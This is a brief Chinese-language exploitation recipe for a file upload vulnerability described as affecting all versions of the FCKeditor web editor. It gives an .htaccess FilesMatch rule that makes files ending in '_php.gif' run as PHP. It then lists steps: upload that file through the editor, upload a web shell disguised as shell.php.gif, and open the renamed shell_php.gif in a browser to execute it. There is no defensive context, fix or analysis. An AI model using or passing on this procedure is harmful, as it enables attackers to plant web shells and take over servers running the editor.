FCKeditor编辑器全版本上传漏洞
漏洞利用方法:
1.创建一个htaccess文件:
加入以下代码:
<FilesMatch “_php.gif”>
SetHandler application/x-httpd-php
</FilesMatch>
2.使用编辑器上传htaccess文件.
3.上传shell.php.gif
4.上传后shell.php.gif, 会自动被改名为 shell_php.gif
5.访问http://xxxx/上传目录/shell_php.gif